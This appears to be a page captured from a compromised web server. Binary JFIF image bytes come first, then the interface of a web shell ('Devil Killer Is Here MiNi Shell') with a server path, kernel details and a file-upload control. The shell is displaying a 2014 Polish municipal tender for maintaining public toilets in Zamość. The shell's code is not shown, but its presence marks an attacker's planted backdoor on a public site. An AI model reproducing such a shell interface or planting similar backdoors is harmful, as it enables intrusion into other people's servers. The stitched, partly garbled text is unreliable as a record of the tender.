JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140115/16220-N-2014.html

<p class="kh_header"><b>Zamość: Świadczenie usługi w zakresie bieżącego utrzymania szaletów miejskich w Zamościu</b><br>
<b>Numer ogłoszenia: 16220 - 2014; data zamieszczenia: 15.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zamość , Rynek Wielki 13, 22-400 Zamość, woj. lubelskie, tel. 084 6392084, faks 084 6393054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi w zakresie bieżącego utrzymania szaletów miejskich w Zamościu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie bieżącego utrzymania szaletów miejskich w Zamościu.
2. Przedmiot zamówienia jest udzielany w podziale na 2 zadania. Zamawiający dopuszcza złożenie oferty na jedną lub dwie części zamówienia (Zadań).
3.Tereny wchodzące w zakres przedmiotu zamówienia każdego z Zadań objęte są ochroną konserwatorską poprzez wpis do rejestru zabytków województwa lubelskiego.
4.Zadanie Nr 1: Szalet miejski przy ul. M. Reja w Zamościu.
4.1.Przedmiotem zamówienia jest świadczenie usługi utrzymania szaletu miejskiego znajdującego się przy ul. M. Reja w Zamościu na działce w arkuszu mapy 49 o numerze geodezyjnym 123/3 (wyrys działki stanowi Załącznik Nr 8a do SIWZ).
4.2.Zakres usługi obejmuje wykonanie następującego rodzaju prac:
1.Otwieranie szaletu w sezonie jesienno - zimowym (od października do marca) w godzinach 7:00 - 16:00 oraz w sezonie wiosenno - letnim (od kwietnia do września)  7:00 - 18:00 od poniedziałku do soboty wraz z pobieraniem opłaty za korzystanie z szaletu zgodnie z obowiązującym Zarządzeniem Prezydenta Miasta Zamość w sprawie opłaty za korzystanie z szaletów publicznych na terenie miasta Zamość (zebrana opłata w całości stanowić będzie dochód Wykonawcy zgodnie z pkt 4.3 SIWZ).
2.Utrzymanie zimowe przekazanego terenu na bieżąco, poprzez:
a)usuwanie śniegu, lodu, błota, sopli, 
b) likwidacja śliskości chodnika prowadzącego do budynku przez posypywanie piaskiem,
c) likwidacja śliskości schodów wewnątrz budynku poprzez wycieranie do sucha.
3.Sprawowanie bieżącego nadzoru nad powierzonym mieniem Miasta poprzez codzienne sprawdzenia prawidłowego działania wszystkich urządzeń sanitarnych i elektrycznych zainstalowanych w szalecie oraz niezwłoczne poinformowanie Zamawiającego o wystąpieniu ewentualnych uszkodzeń.
4.Powierzchniowe oczyszczanie szaletu poprzez codzienne: 
a) zamiatanie i mycie na mokro powierzchni płaskich,
b) sprzątanie i dezynfekowanie urządzeń sanitarnych (umywalki, pisuary, sedesy),
c) czyszczenie baterii umywalkowych,
d) opróżnianie śmietników.
5.Zgłaszania do Komendy Miejskiej Policji lub Straży Miejskiej dewastacji szaletu oraz niezwłoczne poinformowanie Zamawiającego o podjętej decyzji przez ww. organy.
6.Przedstawianie do Wydziału Gospodarki Komunalnej i Ochrony Środowiska comiesięcznego sprawozdania z ilości osób korzystających z szaletu miejskiego (z podziałem na kabinę i pisuar).
4.3.Zebrana przez Wykonawcę opłata za korzystanie z szaletu miejskiego, określona w pkt 4.2 ppkt.1 SIWZ, w całości stanowić będzie dochód Wykonawcy, który należy uwzględnić przy kalkulacji ceny w składanej ofercie na usługę utrzymania szaletu miejskiego znajdującego się przy ulicy Reja w Zamościu.
4.4.Wykonawca zobowiązany jest do zawarcia we własnym imieniu i na własny rachunek umów:
a)na dostawę energii elektrycznej do szaletu,
b)na odbiór odpadów komunalnych, 
c)na dostawę wody i odbiór  nieczystości ciekłych z szaletu.
4.5.W związku z wykonaniem remontu szaletu w ramach projektu pn.: Rewitalizacja Rynku Nowego Miasta i jego otoczenia przekazany obiekt objęty jest gwarancją należytego wykonania umowy przez Wykonawcę robót budowlanych. W związku z tym Zamawiający informuje, że na terenie ww. obiektu nie można dokonywać żadnych zmian.
4.6.Szczegółowy zakres, terminy, rozmiar i kolejność wykonania poszczególnych prac został określony w załączniku nr 7a do SIWZ oraz w projekcie umowy stanowiącym załącznik nr 6a do SIWZ. 
4.7.Szczegółowa lokalizacja przedmiotu zadania została określona w załączniku nr 8a (Wyrys działki z ewidencji gruntów i budynków).

5.Zadanie Nr 2: Szalet miejski przy ul. Szczebrzeskiej 3 w Zamościu.
5.1.	Przedmiotem zamówienia jest świadczenie usługi utrzymania szaletu miejskiego znajdującego się w części budynku przy ul. Szczebrzeskiej 3 w Zamościu na działce w arkuszu mapy 45 o numerze geodezyjnym 6 (wyrys działki stanowi Załącznik Nr 8b do SIWZ).
5.2.	Zakres usługi obejmuje wykonanie następującego rodzaju prac:
1.	Otwieranie szaletu w sezonie jesienno - zimowym (od października do marca) 
w godzinach 7:00 - 16:00 oraz w sezonie wiosenno - letnim ( od kwietnia do września) 7:00 - 20:00 siedem dni w tygodniu wraz z pobieraniem opłaty za korzystanie z szaletu zgodnie z obowiązującym Zarządzeniem Prezydenta Miasta Zamość w sprawie opłaty za korzystanie z szaletów publicznych na terenie miasta Zamość ( zebrana opłata w całości stanowić będzie dochód Wykonawcy zgodnie z pkt. 5.3 SIWZ).
2.	Utrzymanie zimowe przekazanego terenu poprzez:
a)	usuwanie śniegu, lodu, błota, sopli, 
b)	likwidacja śliskości chodnika prowadzącego do budynku przez posypywanie piaskiem,
c)	likwidacja śliskości powierzchni płaskich wewnątrz budynku poprzez wycieranie do sucha.
3.	Sprawowanie bieżącego nadzoru nad powierzonym mieniem Miasta poprzez codzienne sprawdzenia prawidłowego działania wszystkich urządzeń sanitarnych i elektrycznych zainstalowanych w szalecie oraz niezwłoczne poinformowanie Zamawiającego o wystąpieniu ewentualnych uszkodzeń.
4.	Powierzchniowe oczyszczanie szaletu poprzez codzienne: 
a)	zamiatanie i mycie na mokro powierzchni płaskich,
b)	sprzątanie i dezynfekowanie urządzeń sanitarnych (umywalki, pisuary, sedesy),
c)	czyszczenie baterii umywalkowych,
d)	opróżnianie śmietników.
5.	Zgłaszania do Komendy Miejskiej Policji lub Straży Miejskiej dewastacji szaletu oraz niezwłoczne poinformowanie Zamawiającego o podjętej decyzji przez ww. organy.
6.	Przedstawianie do Wydziału Gospodarki Komunalnej i Ochrony Środowiska comiesięcznego sprawozdania z ilości osób korzystających z szaletu miejskiego (z podziałem na kabinę i pisuar).
5.3.	Zebrana przez Wykonawcę opłata za korzystanie z szaletu miejskiego, określona w pkt 5.2 ppkt.1 SIWZ, w całości stanowić będzie dochód Wykonawcy, który należy uwzględnić przy kalkulacji ceny w składanej ofercie na usługę utrzymania szaletu miejskiego znajdującego się przy ulicy Szczebrzeskiej w Zamościu.
5.4.	Wykonawca zobowiązany jest do zawarcia we własnym imieniu i na własny rachunek umów:
a)	na dostawę energii elektrycznej do szaletu,
b)	na odbiór odpadów komunalnych,
c)	 na dostawę wody i odbiór  nieczystości ciekłych z szaletu.
5.5.	Szczegółowy zakres, terminy, rozmiar i kolejność wykonania poszczególnych prac został określony w załączniku nr 7b do SIWZ oraz projekcie umowy stanowiącym załącznik nr 6b do SIWZ.
5.6.	 Szczegółowa lokalizacja przedmiotu zadania została określona w załączniku nr 8b (Wyrys z ewidencji gruntów i budynków)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.60.00.00-3, 50.87.00.00-4, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Zamawiający nie wyznacza szczegółowych warunków w tym zakresie. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla Zadania nr 1 i 2
Zamawiający przy ocenie spełniania przez Wykonawcę warunku wiedzy i doświadczenia będzie brał pod uwagę wyłącznie główne usługi wykonane, a w przypadku świadczeń okresowych lub ciągłych, również wykonywane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, które zostaną poparte dowodami wskazującymi, czy zostały wykonane lub są wykonywane należycie.

Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykaże się wykonaniem - co najmniej jednej usługi w zakresie całorocznego utrzymania szaletów tj. przez okres ciągły 12 miesięcy oraz załączy dowody określające, czy usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia  w wysokości:
dla zadania nr 1 - co najmniej  20.000,00 zł (słownie: dwadzieścia tysięcy złotych),
dla zadania nr 2 - co najmniej  20.000,00 zł (słownie: dwadzieścia tysięcy złotych).

UWAGA! W przypadku składania oferty na więcej niż jedną część zamówienia (Zadań) Zamawiający uzna spełnienie warunku sytuacji ekonomicznej i finansowej jeżeli Wykonawca wykaże posiadanie opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż suma wartości wszystkich części (Zadań), na które Wykonawca składa ofertę

2. Wartości pieniężne wskazane w dokumentach złożonych przez Wykonawcę w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa powyżej, podane w walutach innych niż PLN, Wykonawca przeliczy na złote polskie wg średniego kursu walut NBP z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu ogłoszenia nie będzie opublikowany średni kurs walut przez NBP, Wykonawca powinien przyjąć kurs przeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem publikacji ogłoszenia o zamówieniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykaże się wykonaniem - co najmniej jednej usługi w zakresie całorocznego utrzymania szaletów tj. przez okres ciągły 12 miesięcy oraz załączy dowody określające, czy usługi te zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli na podstawie art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, to Wykonawca w takiej sytuacji zobowiązany jest do udowodnienia Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia okoliczności: 
a)	gdy konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
b)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie, mającym wpływ na realizację przedmiotu umowy, 
c)	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, w szczególności zmiana terminu realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zamosc.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (materiały przetargowe) można także uzyskać nieodpłatnie w siedzibie Zamawiającego: Urząd Miasta Zamość ul. Rynek Wielki 13 (Ratusz), 22-400 Zamość, pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2014 godzina 10:00, miejsce: Oferty należy składać w pokoju nr 7 (Sekretariat Prezydenta Miasta) w Urzędzie Miasta Zamość, 22-400 Zamość, Rynek Wielki 13 (Ratusz).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Publiczne otwarcie ofert nastąpi w dniu 17 lutego 2014r. o godz. 10:30 w siedzibie Zamawiającego - w Urzędzie Miasta Zamość, Rynek Wielki 13, 22-400 Zamość w pokoju nr 12 (Ratusz). 2. Osoby uprawnione do kontaktu z Wykonawcami: Marta Trych, Małgorzata Strzępek fax (84) 639-30-54, e-mail: zamowienia@zamosc.um.gov.pl..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1: Szalet miejski przy ul. M. Reja w Zamościu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 1: Szalet miejski przy ul. M. Reja w Zamościu.
1.	Przedmiotem zamówienia jest świadczenie usługi utrzymania szaletu miejskiego znajdującego się przy ul. M. Reja w Zamościu na działce w arkuszu mapy 49 o numerze geodezyjnym 123/3 (wyrys działki stanowi Załącznik Nr 8a do SIWZ).
2.	Zakres usługi obejmuje wykonanie następującego rodzaju prac:
1.	Otwieranie szaletu w sezonie jesienno - zimowym (od października do marca) w godzinach 7:00 - 16:00 oraz w sezonie wiosenno - letnim (od kwietnia do września)  7:00 - 18:00 od poniedziałku do soboty wraz z pobieraniem opłaty za korzystanie z szaletu zgodnie z obowiązującym Zarządzeniem Prezydenta Miasta Zamość w sprawie opłaty za korzystanie z szaletów publicznych na terenie miasta Zamość (zebrana opłata w całości stanowić będzie dochód Wykonawcy zgodnie z pkt. 3 SIWZ).
2.	Utrzymanie zimowe przekazanego terenu na bieżąco, poprzez:
a)	 usuwanie śniegu, lodu, błota, sopli, 
b)	 likwidacja śliskości chodnika prowadzącego do budynku przez posypywanie piaskiem,
c)	 likwidacja śliskości schodów wewnątrz budynku poprzez wycieranie do sucha.
